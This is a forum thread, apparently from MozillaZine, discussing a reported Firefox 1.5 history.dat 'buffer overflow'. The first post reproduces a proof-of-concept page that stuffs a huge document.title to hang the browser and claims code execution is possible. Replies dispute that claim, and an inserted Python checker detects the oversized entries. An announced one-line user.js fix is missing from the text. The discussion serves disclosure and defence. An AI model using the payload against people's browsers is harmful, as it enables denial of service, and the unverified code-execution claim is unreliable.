FireFox 1.5 Buffer overflow exploit
34 posts, page 1 of 3
This may have already been reported, but I'm going to post it here.

<!--
Firefox 1.5 buffer overflow

Basically Firefox logs all kinds of URL data in its history.dat file. This little script will set a really large topic and Firefox will then save that topic into its history.dat. The next time that Firefox is opened, it will instantly crash due to a buffer overflow -- this will happen every time until you manually delete the history.dat file -- which most users won't figure out. This proof of concept will only prevent someone from reopening their browser after being exploited. DoS if you will. However, code execution is possible with some modifications.

Tested with Firefox 1.5 on Windows XP SP2.

ZIPLOCK <sickbeatz@gmail.com>
-->
<html>
<head>
<title>heh</title>
<script type="text/javascript">
function ex() {
    // build a 5000-character string of "A"
    var buffer = "";
    for (var i = 0; i < 5000; i++) {
        buffer += "A";
    }
    // append it 500 more times (2,505,000 characters in total)
    var buffer2 = buffer;
    for (i = 0; i < 500; i++) {
        buffer2 += buffer;
    }
    // the oversized title is what ends up stored in history.dat
    document.title = buffer2;
}
</script>
</head>
<body>ZIPLOCK says <a href="javascript:ex();">CLICK ME </a></body>
</html>

I'll shift this over to Firefox Bugs for further discussion. Interesting discovery.

markedmannerf, you will have to register a username if you want to post in that forum.
I don't know how to do any of this stuff, I just hire the guys that do
Have you considered reading the HELP folder. Right there on your menu bar. Image by Juniper http onic.net/~daylight/ - Xmas special by Ol Grumpy

This is NOT the proper way to report a security bug.

Please see http://www.mozilla.org/projects/securit ... olicy.html

Is this your source?

http://packetstormsecurity.org/0512-exp ... erflow.txt

Hopefully they at least notified the security crew before they published this. Seeing as no update has been pushed out, I assume not. How kind of them.
And here is one of the comments from Digg:

"And I can't believe you didn't see where the stack is involved. The size of whatever FF is reading is obviously BIGGER than whatever BUFFER is being used to store it, thus causing an OVERFLOW of that BUFFER."

How do YOU see where the stack is involved? There is no buffer overflow and no threat of arbitrary code execution; Firefox does not crash when the script is executed, nor at startup when it reads history.dat. The script causes a very large (~10MB) string to be written to history.dat (that's just a text file; you can open it in Notepad and take a look). The algorithm Firefox uses to parse this file was presumably not intended to handle such large strings and therefore takes a long time to load the file (1 to 2 mins). It allocates a buffer on the heap of arbitrary size and begins reading the string. When it determines that the buffer is not big enough to hold the entire string, it allocates a new, larger buffer, copies the old data to the new buffer, and continues reading. Repeat until you've allocated a buffer large enough to hold the entire 10MB string. Inefficient? Yes. Buffer overflow exploit? No."

It's not a "security issue" as there's no known way to exploit it or run malicious code; all this does is cause Firefox to load much slower. Still, I think this should be fixed fast and a 1.5.1 should be available within a week to reaffirm that open source releases fixes fast. It's a PR thing.

Would be good to see if the update feature works fine too!
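Since the post above says history.dat is a plain text file holding one stuffed title, here is an added example (not from the thread or from Mozilla) of a small Python checker that locates the oversized record so it can be cut out, rather than deleting the whole history.dat as the original post says users must. The sample data is constructed and only loosely imitates the file's layout, and the 4096-byte threshold is an assumption: real titles and URLs are a few hundred bytes at most.

```python
import re
from typing import List, Tuple

# Constructed sample, loosely imitating a text history file (not real Mork syntax):
# two ordinary entries followed by a title of 6000 'A's like the PoC would leave behind.
SAMPLE_HISTORY = (
    b"<(A1=http://www.mozilla.org/)(A2=Mozilla Firefox)>\n"
    b"<(A3=http://forums.mozillazine.org/)(A4=MozillaZine Forums)>\n"
    b"<(A5=http://example.invalid/poc.html)(A6=" + b"A" * 6000 + b")>\n"
)

# A "token" here is any run of bytes without whitespace; a stuffed title of
# repeated 'A's shows up as one enormous token.
TOKEN = re.compile(rb"\S+")


def scan_for_oversized(data: bytes, threshold: int = 4096) -> List[Tuple[int, int]]:
    """Return (offset, length) for every whitespace-free run longer than threshold."""
    return [(m.start(), m.end() - m.start())
            for m in TOKEN.finditer(data)
            if m.end() - m.start() > threshold]


def scan_file(path: str, threshold: int = 4096) -> List[Tuple[int, int]]:
    """Scan a history file on disk; the file is normally small enough to read whole."""
    with open(path, "rb") as f:
        return scan_for_oversized(f.read(), threshold)


def describe(data: bytes, threshold: int = 4096) -> str:
    """Human-readable summary of where the oversized records sit."""
    hits = scan_for_oversized(data, threshold)
    if not hits:
        return "no oversized entries"
    return "; ".join(f"offset {off}: {ln} bytes" for off, ln in hits)


if __name__ == "__main__":
    print(describe(SAMPLE_HISTORY))
```

Run against a real profile with scan_file(path); a hit tells you which record to remove with a text editor instead of wiping the whole history.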
One-line fix in user.js:
Probably a few edge cases of legitimate sites not being able to set your window title, but screw ’em.

Thanks for picking up on this, Elfguy and others. The OP started off in the user support forum - I figured the crew over here might have some more answers.
Is this fix for the same buffer overflow mentioned in this page? http://forums.mozillazine.org/viewtopic.php?t=346858
They're two different problems.

Thanks, Unarmed, for the workaround -- that's a lot better than having to set my history to 0 days.
I am unable to find the user.js file. I tried adding it to prefs.js without success. Any direction? I am using XP SP2. Thanks.